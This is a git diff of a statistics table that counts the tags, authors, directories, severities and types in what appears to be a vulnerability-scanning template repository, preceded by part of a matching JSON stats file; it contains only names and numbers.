{"name":"accela","count":1},{"name":"acme","count":1},{"name":"bolt","count":1},{"name":"acexy","count":1},{"name":"motorola","count":1},{"name":"graylog","count":1},{"name":"erp-nc","count":1},{"name":"viewpoint","count":1},{"name":"xampp","count":1},{"name":"dotnet","count":1},{"name":"logontracer","count":1},{"name":"plone","count":1},{"name":"redhat","count":1},{"name":"geutebruck","count":1},{"name":"tongda","count":1},{"name":"addpac","count":1},{"name":"linksys","count":1},{"name":"gespage","count":1},{"name":"speed","count":1},{"name":"hortonworks","count":1},{"name":"jenzabar","count":1},{"name":"kafdrop","count":1},{"name":"zzzcms","count":1},{"name":"weather","count":1},{"name":"adiscon","count":1},{"name":"servicenow","count":1},{"name":"tracer","count":1},{"name":"announcekit","count":1},{"name":"tensorflow","count":1},{"name":"csod","count":1},{"name":"dotnetnuke","count":1},{"name":"elasticsearch","count":1},{"name":"graphite","count":1},{"name":"zte","count":1},{"name":"glances","count":1},{"name":"default","count":1},{"name":"opensns","count":1},{"name":"shoppable","count":1},{"name":"uwsgi","count":1},{"name":"testrail","count":1},{"name":"couchbase","count":1},{"name":"plastic","count":1},{"name":"pagerduty","count":1},{"name":"gloo","count":1},{"name":"gsoap","count":1},{"name":"finereport","count":1},{"name":"bash","count":1},{"name":"lg-nas","count":1},{"name":"geolocation","count":1},{"name":"wing-ftp","count":1},{"name":"resourcespace","count":1},{"name":"nweb2fax","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":279},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"zzeitlin","count":63},{"name":"madrobot","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"xelkomy","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"johnk3r","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":5},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"idealphase","count":3},{"name":"shine","count":3},{"name":"me9187","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"_generic_human_","count":3},{"name":"binaryfigments","count":3},{"name":"socketz","count":2},{"name":"lotusdll","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"davidmckennirey","count":2},{"name":"bernardofsr","count":2},{"name":"0xelkomy","count":2},{"name":"random-robbie","count":2},{"name":"swissky","count":2},{"name":"arcc","count":2},{"name":"hetroublemakr","count":2},{"name":"vavkamil","count":2},{"name":"r12w4n","count":2},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"x1m_martijn","count":2},{"name":"amsda","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"koti2","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"kiblyn11","count":2},{"name":"convisoappsec","count":2},{"name":"0xsmiley","count":2},{"name":"udit_thakkur","count":2},{"name":"w4cky_","count":2},{"name":"alifathi-h1","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"mohammedsaneem","count":2},{"name":"sy3omda","count":2},{"name":"cocxanh","count":2},{"name":"zomsop82","count":2},{"name":"ehsahil","count":2},{"name":"gal nagli","count":2},{"name":"moritz nentwig","count":2},{"name":"ajaysenr","count":1},{"name":"un-fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"rodnt","count":1},{"name":"borna nematzadeh","count":1},{"name":"brabbit10","count":1},{"name":"nerrorsec","count":1},{"name":"regala_","count":1},{"name":"@ofjaaah","count":1},{"name":"akash.c","count":1},{"name":"ahmetpergamum","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"geraldino2","count":1},{"name":"izn0u","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"makyotox","count":1},{"name":"orpheus","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0xtavian","count":1},{"name":"mubassirpatel","count":1},{"name":"exploitation","count":1},{"name":"jrolf","count":1},{"name":"akshansh","count":1},{"name":"thebinitghimire","count":1},{"name":"retr0","count":1},{"name":"mesaglio","count":1},{"name":"bolli95","count":1},{"name":"furkansenan","count":1},{"name":"willd96","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"affix","count":1},{"name":"flag007","count":1},{"name":"berkdusunur","count":1},{"name":"yashgoti","count":1},{"name":"push4d","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"hanlaomo","count":1},{"name":"shreyapohekar","count":1},{"name":"becivells","count":1},{"name":"kareemse1im","count":1},{"name":"alperenkesk","count":1},{"name":"j33n1k4","count":1},{"name":"nytr0gen","count":1},{"name":"pratik khalane","count":1},{"name":"jteles","count":1},{"name":"ooooooo_q","count":1},{"name":"b0yd","count":1},{"name":"pudsec","count":1},{"name":"d0rkerdevil","count":1},{"name":"hakluke","count":1},{"name":"petruknisme","count":1},{"name":"raesene","count":1},{"name":"nvn1729","count":1},{"name":"alex","count":1},{"name":"juicypotato1","count":1},{"name":"aresx","count":1},{"name":"0xteles","count":1},{"name":"manuelbua","count":1},{"name":"naglinagli","count":1},{"name":"absshax","count":1},{"name":"rotemreiss","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"yashanand155","count":1},{"name":"ohlinge","count":1},{"name":"apt-mirror","count":1},{"name":"kurohost","count":1},{"name":"jeya seelan","count":1},{"name":"iampritam","count":1},{"name":"streetofhackerr007","count":1},{"name":"xstp","count":1},{"name":"alph4byt3","count":1},{"name":"kabirsuda","count":1},{"name":"revblock","count":1},{"name":"whynotke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xd0ff9","count":1},{"name":"tirtha_mandal","count":1},{"name":"taielab","count":1},{"name":"sicksec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"forgedhallpass","count":1},{"name":"cookiehanhoan","count":1},{"name":"blckraven","count":1},{"name":"philippdelteil","count":1},{"name":"intx0x80","count":1},{"name":"luskabol","count":1},{"name":"chron0x","count":1},{"name":"elmahdi","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sec_hawk","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"toufik airane","count":1},{"name":"elder tao","count":1},{"name":"sickwell","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"shelld3v","count":1},{"name":"pdp","count":1},{"name":"droberson","count":1},{"name":"qlkwej","count":1},{"name":"noamrathaus","count":1},{"name":"oscarintherocks","count":1},{"name":"vzamanillo","count":1},{"name":"rojanrijal","count":1},{"name":"ahmed sherif","count":1},{"name":"s1r1u5_","count":1},{"name":"daviey","count":1},{"name":"schniggie","count":1},{"name":"@dwisiswant0","count":1},{"name":"bjhulst","count":1},{"name":"bad5ect0r","count":1},{"name":"evolutionsec","count":1},{"name":"ilovebinbash","count":1},{"name":"lark lab","count":1},{"name":"kre80r","count":1},{"name":"clarkvoss","count":1},{"name":"b4uh0lz","count":1},{"name":"patralos","count":1},{"name":"udyz","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ringo","count":1},{"name":"wabafet","count":1},{"name":"andirrahmani1","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"_darrenmartyn","count":1},{"name":"c3l3si4n","count":1},{"name":"undefl0w","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"knassar702","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"notsoevilweasel","count":1},{"name":"ipanda","count":1},{"name":"thezakman","count":1},{"name":"defr0ggy","count":1},{"name":"elouhi","count":1},{"name":"52971","count":1},{"name":"andysvints","count":1},{"name":"deena","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"thevillagehacker","count":1},{"name":"b0rn2r00t","count":1},{"name":"luci","count":1},{"name":"mass0ma","count":1},{"name":"x6263","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"ldionmarcil","count":1},{"name":"zandros0","count":1},{"name":"tim_koopmans","count":1},{"name":"smaranchand","count":1},{"name":"yavolo","count":1},{"name":"fopina","count":1},{"name":"dawid-czarnecki","count":1},{"name":"remonsec","count":1},{"name":"sshell","count":1},{"name":"infosecsanyam","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"omarkurt","count":1},{"name":"@github.com/defr0ggy","count":1}],"directory":[{"name":"cves","count":837},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":141},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":649},{"name":"medium","count":476},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2211},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 32a1631abc..2d10f4b6f9 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,926 +1,926 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | | lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | +| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | | wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | | exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | | rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 165 | zzeitlin | 63 | file | 50 | | | | | | cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | | joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | -| config | 95 | ice3man | 26 | dns | 12 | | | | | +| config | 96 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | pr3r00t | 15 | cnvd | 9 | | | | | | iot | 70 | sheikhrishad | 15 | headless | 5 | | | | | -| takeover | 69 | milo2012 | 14 | | | | | | | -| oob | 68 | techbrunchfr | 13 | | | | | | | +| oast | 69 | milo2012 | 14 | | | | | | | +| takeover | 69 | techbrunchfr | 13 | | | | | | | | default-login | 68 | suman_kar | 12 | | | | | | | -| token | 67 | cyllective | 11 | | | | | | | -| token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | random_robbie | 10 | | | | | | | -| file | 50 | righettod | 10 | | | | | | | -| unauth | 49 | melbadry9 | 10 | | | | | | | -| network | 43 | nadino | 10 | | | | | | | -| ssrf | 41 | wdahlenb | 10 | | | | | | | +| token | 67 | r3dg33k | 11 | | | | | | | +| token-spray | 63 | cyllective | 11 | | | | | | | +| cve2017 | 51 | nadino | 10 | | | | | | | +| file | 50 | random_robbie | 10 | | | | | | | +| unauth | 49 | wdahlenb | 10 | | | | | | | +| network | 43 | righettod | 10 | | | | | | | +| ssrf | 42 | melbadry9 | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | zh | 8 | | | | | | | -| redirect | 37 | aashiq | 8 | | | | | | | -| cve2016 | 37 | iamthefrogy | 8 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| google | 30 | randomstr1ng | 7 | | | | | | | -| cve2015 | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | harshbothra_ | 7 | | | | | | | -| jira | 29 | meme-lord | 7 | | | | | | | -| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | -| cisco | 27 | dogasantos | 7 | | | | | | | -| listing | 27 | kophjager007 | 7 | | | | | | | -| generic | 24 | dr_set | 7 | | | | | | | +| | 38 | iamthefrogy | 8 | | | | | | | +| cve2016 | 37 | zh | 8 | | | | | | | +| redirect | 37 | that_juan_ | 8 | | | | | | | +| oracle | 36 | aashiq | 8 | | | | | | | +| google | 30 | meme-lord | 7 | | | | | | | +| logs | 30 | dr_set | 7 | | | | | | | +| jira | 29 | techryptic (@tech) | 7 | | | | | | | +| cve2015 | 29 | randomstr1ng | 7 | | | | | | | +| atlassian | 29 | kophjager007 | 7 | | | | | | | +| cisco | 27 | 0x240x23elu | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | +| listing | 27 | dogasantos | 7 | | | | | | | +| generic | 24 | oppsec | 7 | | | | | | | | misc | 23 | emadshanab | 7 | | | | | | | -| disclosure | 23 | divya_mudgal | 6 | | | | | | | -| auth-bypass | 23 | caspergn | 6 | | | | | | | -| misconfig | 22 | logicalhunter | 6 | | | | | | | -| router | 22 | puzzlepeaches | 6 | | | | | | | +| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| disclosure | 23 | pentest_swissky | 6 | | | | | | | +| router | 22 | divya_mudgal | 6 | | | | | | | +| misconfig | 22 | caspergn | 6 | | | | | | | | aem | 19 | __fazal | 6 | | | | | | | -| cve2012 | 18 | pentest_swissky | 6 | | | | | | | -| springboot | 18 | panch0r3d | 5 | | | | | | | -| sap | 18 | lu4nx | 5 | | | | | | | -| debug | 18 | ganofins | 5 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| devops | 15 | rootxharsh | 5 | | | | | | | -| cve2011 | 15 | iamnoooob | 5 | | | | | | | -| login | 14 | elsfa7110 | 5 | | | | | | | -| fuzz | 14 | xelkomy | 5 | | | | | | | +| cve2012 | 18 | puzzlepeaches | 6 | | | | | | | +| debug | 18 | elsfa7110 | 5 | | | | | | | +| springboot | 18 | iamnoooob | 5 | | | | | | | +| sap | 18 | johnk3r | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | panch0r3d | 5 | | | | | | | +| devops | 15 | ganofins | 5 | | | | | | | +| login | 14 | yanyun | 5 | | | | | | | | cve2009 | 14 | joanbono | 5 | | | | | | | -| aws | 14 | johnk3r | 5 | | | | | | | -| weblogic | 14 | nodauf | 4 | | | | | | | -| struts | 14 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | e_schultze_ | 4 | | | | | | | -| android | 13 | wisnupramoedya | 4 | | | | | | | -| dlink | 13 | tess | 4 | | | | | | | -| adobe | 13 | incogbyte | 4 | | | | | | | -| deserialization | 13 | mavericknerd | 3 | | | | | | | -| zoho | 13 | shifacyclewala | 3 | | | | | | | -| manageengine | 12 | fyoorer | 3 | | | | | | | -| jenkins | 12 | sullo | 3 | | | | | | | -| wp-theme | 12 | yash anand @yashanand155 | 3 | | | | | | | -| magento | 11 | vsh00t | 3 | | | | | | | -| cve2013 | 11 | binaryfigments | 3 | | | | | | | -| intrusive | 10 | impramodsargar | 3 | | | | | | | -| xxe | 10 | johnjhacking | 3 | | | | | | | -| dell | 10 | unstabl3 | 3 | | | | | | | -| hp | 10 | 0w4ys | 3 | | | | | | | -| vmware | 9 | z3bd | 3 | | | | | | | -| ftp | 9 | jarijaas | 3 | | | | | | | -| kubernetes | 9 | me9187 | 3 | | | | | | | -| gitlab | 8 | idealphase | 3 | | | | | | | -| scada | 8 | sushantkamble | 3 | | | | | | | -| cve2008 | 8 | _generic_human_ | 3 | | | | | | | -| airflow | 8 | dudez | 3 | | | | | | | -| backup | 8 | emenalf | 3 | | | | | | | -| ibm | 8 | shine | 3 | | | | | | | -| microsoft | 8 | f1tz | 3 | | | | | | | -| rails | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | -| ruijie | 8 | parth | 2 | | | | | | | -| nginx | 8 | alifathi-h1 | 2 | | | | | | | -| fastjson | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| netgear | 7 | g4l1t0 | 2 | | | | | | | -| files | 7 | afaq | 2 | | | | | | | -| cms | 7 | swissky | 2 | | | | | | | -| coldfusion | 7 | nkxxkn | 2 | | | | | | | -| confluence | 7 | koti2 | 2 | | | | | | | -| jetty | 6 | bernardofsr | 2 | | | | | | | -| nodejs | 6 | lotusdll | 2 | | | | | | | -| lucee | 6 | moritz nentwig | 2 | | | | | | | -| phpmyadmin | 6 | huowuzhao | 2 | | | | | | | -| solr | 6 | socketz | 2 | | | | | | | -| drupal | 6 | arcc | 2 | | | | | | | -| django | 6 | 0xsapra | 2 | | | | | | | -| laravel | 6 | 0xelkomy | 2 | | | | | | | -| rconfig | 6 | sy3omda | 2 | | | | | | | -| citrix | 6 | gal nagli | 2 | | | | | | | -| api | 6 | dheerajmadhukar | 2 | | | | | | | -| fileupload | 6 | joeldeleep | 2 | | | | | | | -| docker | 6 | bing0o | 2 | | | | | | | -| camera | 6 | fabaff | 2 | | | | | | | -| crlf | 5 | 0xsmiley | 2 | | | | | | | -| jolokia | 5 | r12w4n | 2 | | | | | | | -| circarlife | 5 | hahwul | 2 | | | | | | | -| printer | 5 | pxmme1337 | 2 | | | | | | | -| java | 5 | zomsop82 | 2 | | | | | | | -| headless | 5 | ree4pwn | 2 | | | | | | | -| windows | 5 | whoever | 2 | | | | | | | -| iis | 5 | udit_thakkur | 2 | | | | | | | -| dedecms | 5 | mohammedsaneem | 2 | | | | | | | -| ssti | 5 | davidmckennirey | 2 | | | | | | | -| tomcat | 5 | random-robbie | 2 | | | | | | | -| git | 4 | amsda | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| wso2 | 4 | r3naissance | 2 | | | | | | | -| thinkphp | 4 | manas_harsh | 2 | | | | | | | -| npm | 4 | vavkamil | 2 | | | | | | | -| slack | 4 | kiblyn11 | 2 | | | | | | | -| exchange | 4 | 0xrudra | 2 | | | | | | | -| symantec | 4 | bsysop | 2 | | | | | | | -| firmware | 4 | randomrobbie | 2 | | | | | | | -| webserver | 4 | cocxanh | 2 | | | | | | | -| artifactory | 4 | x1m_martijn | 2 | | | | | | | -| zimbra | 4 | gevakun | 2 | | | | | | | -| magmi | 4 | bp0lr | 2 | | | | | | | -| firebase | 4 | convisoappsec | 2 | | | | | | | -| symfony | 4 | 0xcrypto | 2 | | | | | | | -| samsung | 4 | 0xprial | 2 | | | | | | | -| solarwinds | 4 | hetroublemakr | 2 | | | | | | | -| buffalo | 4 | ehsahil | 2 | | | | | | | -| hongdian | 4 | w4cky_ | 2 | | | | | | | -| rfi | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| resin | 4 | ratnadip gajbhiye | 1 | | | | | | | -| strapi | 4 | shelld3v | 1 | | | | | | | -| maps | 4 | 0xrod | 1 | | | | | | | -| zabbix | 4 | orpheus | 1 | | | | | | | -| moodle | 4 | becivells | 1 | | | | | | | -| traversal | 4 | @ofjaaah | 1 | | | | | | | -| elastic | 4 | pratik khalane | 1 | | | | | | | -| fatpipe | 4 | nvn1729 | 1 | | | | | | | -| glpi | 4 | smaranchand | 1 | | | | | | | -| proxy | 4 | elmahdi | 1 | | | | | | | -| amazon | 4 | raesene | 1 | | | | | | | -| asp | 4 | naglinagli | 1 | | | | | | | -| grafana | 4 | zandros0 | 1 | | | | | | | -| thinkcmf | 4 | infosecsanyam | 1 | | | | | | | -| httpd | 3 | mass0ma | 1 | | | | | | | -| cacti | 3 | taielab | 1 | | | | | | | -| lfr | 3 | xstp | 1 | | | | | | | -| springcloud | 3 | ipanda | 1 | | | | | | | -| bigip | 3 | yashanand155 | 1 | | | | | | | -| search | 3 | thezakman | 1 | | | | | | | -| ofbiz | 3 | blckraven | 1 | | | | | | | -| fanruan | 3 | b0yd | 1 | | | | | | | -| oa | 3 | udyz | 1 | | | | | | | -| cloud | 3 | patralos | 1 | | | | | | | -| vbulletin | 3 | bernardo rodrigues | 1 | | | | | | | +| aws | 14 | lu4nx | 5 | | | | | | | +| struts | 14 | xelkomy | 5 | | | | | | | +| weblogic | 14 | incogbyte | 4 | | | | | | | +| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| zoho | 13 | wisnupramoedya | 4 | | | | | | | +| deserialization | 13 | nodauf | 4 | | | | | | | +| adobe | 13 | github.com/its0x08 | 4 | | | | | | | +| android | 13 | tess | 4 | | | | | | | +| dlink | 13 | 0w4ys | 3 | | | | | | | +| dns | 13 | me9187 | 3 | | | | | | | +| jenkins | 12 | f1tz | 3 | | | | | | | +| manageengine | 12 | shifacyclewala | 3 | | | | | | | +| wp-theme | 12 | z3bd | 3 | | | | | | | +| magento | 11 | idealphase | 3 | | | | | | | +| cve2013 | 11 | yash anand @yashanand155 | 3 | | | | | | | +| xxe | 10 | binaryfigments | 3 | | | | | | | +| dell | 10 | mavericknerd | 3 | | | | | | | +| intrusive | 10 | shine | 3 | | | | | | | +| hp | 10 | jarijaas | 3 | | | | | | | +| kubernetes | 9 | dudez | 3 | | | | | | | +| vmware | 9 | unstabl3 | 3 | | | | | | | +| ftp | 9 | _generic_human_ | 3 | | | | | | | +| gitlab | 8 | fyoorer | 3 | | | | | | | +| cnvd | 8 | sushantkamble | 3 | | | | | | | +| ruijie | 8 | johnjhacking | 3 | | | | | | | +| airflow | 8 | impramodsargar | 3 | | | | | | | +| microsoft | 8 | vsh00t | 3 | | | | | | | +| nginx | 8 | emenalf | 3 | | | | | | | +| scada | 8 | sullo | 3 | | | | | | | +| fastjson | 8 | skeltavik | 3 | | | | | | | +| cve2008 | 8 | thomas_from_offensity | 3 | | | | | | | +| rails | 8 | dheerajmadhukar | 2 | | | | | | | +| backup | 8 | bp0lr | 2 | | | | | | | +| ibm | 8 | gal nagli | 2 | | | | | | | +| confluence | 7 | r12w4n | 2 | | | | | | | +| files | 7 | swissky | 2 | | | | | | | +| cms | 7 | kiblyn11 | 2 | | | | | | | +| coldfusion | 7 | socketz | 2 | | | | | | | +| netgear | 7 | bsysop | 2 | | | | | | | +| nodejs | 6 | random-robbie | 2 | | | | | | | +| camera | 6 | udit_thakkur | 2 | | | | | | | +| laravel | 6 | gevakun | 2 | | | | | | | +| citrix | 6 | vavkamil | 2 | | | | | | | +| api | 6 | 0xelkomy | 2 | | | | | | | +| phpmyadmin | 6 | koti2 | 2 | | | | | | | +| solr | 6 | whoever | 2 | | | | | | | +| django | 6 | moritz nentwig | 2 | | | | | | | +| jetty | 6 | 0xrudra | 2 | | | | | | | +| drupal | 6 | huowuzhao | 2 | | | | | | | +| lucee | 6 | nkxxkn | 2 | | | | | | | +| docker | 6 | lotusdll | 2 | | | | | | | +| rconfig | 6 | fabaff | 2 | | | | | | | +| fileupload | 6 | g4l1t0 | 2 | | | | | | | +| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| headless | 5 | manas_harsh | 2 | | | | | | | +| tomcat | 5 | hahwul | 2 | | | | | | | +| circarlife | 5 | amsda | 2 | | | | | | | +| windows | 5 | hetroublemakr | 2 | | | | | | | +| jolokia | 5 | zomsop82 | 2 | | | | | | | +| crlf | 5 | bernardofsr | 2 | | | | | | | +| dedecms | 5 | randomrobbie | 2 | | | | | | | +| printer | 5 | alifathi-h1 | 2 | | | | | | | +| iis | 5 | sy3omda | 2 | | | | | | | +| ssti | 5 | 0xcrypto | 2 | | | | | | | +| vpn | 4 | ehsahil | 2 | | | | | | | +| slack | 4 | mohammedsaneem | 2 | | | | | | | +| artifactory | 4 | 0xprial | 2 | | | | | | | +| npm | 4 | 0xsmiley | 2 | | | | | | | +| samsung | 4 | davidmckennirey | 2 | | | | | | | +| zabbix | 4 | ree4pwn | 2 | | | | | | | +| exchange | 4 | convisoappsec | 2 | | | | | | | +| thinkcmf | 4 | r3naissance | 2 | | | | | | | +| asp | 4 | 0xsapra | 2 | | | | | | | +| rfi | 4 | afaq | 2 | | | | | | | +| proxy | 4 | x1m_martijn | 2 | | | | | | | +| strapi | 4 | w4cky_ | 2 | | | | | | | +| magmi | 4 | foulenzer | 2 | | | | | | | +| firebase | 4 | arcc | 2 | | | | | | | +| wso2 | 4 | bing0o | 2 | | | | | | | +| symantec | 4 | pxmme1337 | 2 | | | | | | | +| glpi | 4 | cocxanh | 2 | | | | | | | +| thinkphp | 4 | joeldeleep | 2 | | | | | | | +| buffalo | 4 | parth | 2 | | | | | | | +| webserver | 4 | flag007 | 1 | | | | | | | +| moodle | 4 | ajaysenr | 1 | | | | | | | +| fatpipe | 4 | nytr0gen | 1 | | | | | | | +| keycloak | 4 | micha3lb3n | 1 | | | | | | | +| resin | 4 | makyotox | 1 | | | | | | | +| solarwinds | 4 | manuelbua | 1 | | | | | | | +| amazon | 4 | clarkvoss | 1 | | | | | | | +| grafana | 4 | iampritam | 1 | | | | | | | +| zimbra | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| firmware | 4 | dawid-czarnecki | 1 | | | | | | | +| elastic | 4 | absshax | 1 | | | | | | | +| symfony | 4 | notsoevilweasel | 1 | | | | | | | +| git | 4 | akash.c | 1 | | | | | | | +| hongdian | 4 | shifacyclewla | 1 | | | | | | | +| maps | 4 | aceseven (digisec360) | 1 | | | | | | | +| traversal | 4 | shreyapohekar | 1 | | | | | | | +| ebs | 3 | kba@sogeti_esec | 1 | | | | | | | +| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | +| cve2007 | 3 | hanlaomo | 1 | | | | | | | +| ofbiz | 3 | sshell | 1 | | | | | | | +| terramaster | 3 | tirtha_mandal | 1 | | | | | | | +| opensis | 3 | philippdelteil | 1 | | | | | | | +| r-seenet | 3 | ringo | 1 | | | | | | | +| cves | 3 | bolli95 | 1 | | | | | | | +| targa | 3 | mass0ma | 1 | | | | | | | +| kibana | 3 | zhenwarx | 1 | | | | | | | +| mail | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| smtp | 3 | nerrorsec | 1 | | | | | | | +| fpd | 3 | xstp | 1 | | | | | | | +| backdoor | 3 | rodnt | 1 | | | | | | | +| openam | 3 | 0xrod | 1 | | | | | | | +| azure | 3 | j33n1k4 | 1 | | | | | | | +| fanruan | 3 | fmunozs | 1 | | | | | | | +| springcloud | 3 | c3l3si4n | 1 | | | | | | | +| lfr | 3 | orpheus | 1 | | | | | | | +| cacti | 3 | 0ut0fb4nd | 1 | | 